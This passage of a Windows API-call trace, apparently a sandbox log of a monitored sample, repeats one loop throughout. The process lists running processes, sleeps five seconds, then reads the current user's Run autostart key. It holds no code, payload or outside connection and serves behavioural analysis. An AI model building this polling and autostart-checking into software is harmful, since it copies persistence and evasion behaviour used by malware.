(ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.254] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.255] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.256] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.257] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.257] NtClose (Handle=0x274) returned 0x0 [0179.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.266] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.267] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.267] NtClose (Handle=0x274) returned 0x0 [0179.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.270] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.276] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.277] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.277] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.278] NtClose (Handle=0x274) returned 0x0 [0179.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.286] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.287] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.288] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.289] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.289] NtClose (Handle=0x274) returned 0x0 [0179.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.297] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.298] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.299] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.299] NtClose (Handle=0x274) returned 0x0 [0179.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.307] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.308] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.309] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.310] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.310] NtClose (Handle=0x274) returned 0x0 [0179.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.313] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.313] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.320] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.321] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.321] NtClose (Handle=0x274) returned 0x0 [0179.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.336] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.337] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.337] NtClose (Handle=0x274) returned 0x0 [0179.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.536] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.537] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.538] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.539] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.539] NtClose (Handle=0x274) returned 0x0 [0179.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.539] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.543] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.548] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.550] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.551] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.551] NtClose (Handle=0x274) returned 0x0 [0179.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.594] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.595] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.595] NtClose (Handle=0x274) returned 0x0 [0179.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.602] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.604] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.605] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.605] NtClose (Handle=0x274) returned 0x0 [0179.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.614] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.615] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0179.616] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0179.617] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0179.617] NtClose (Handle=0x274) returned 0x0 [0179.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0179.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0179.619] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0179.620] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0179.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0179.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0179.624] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 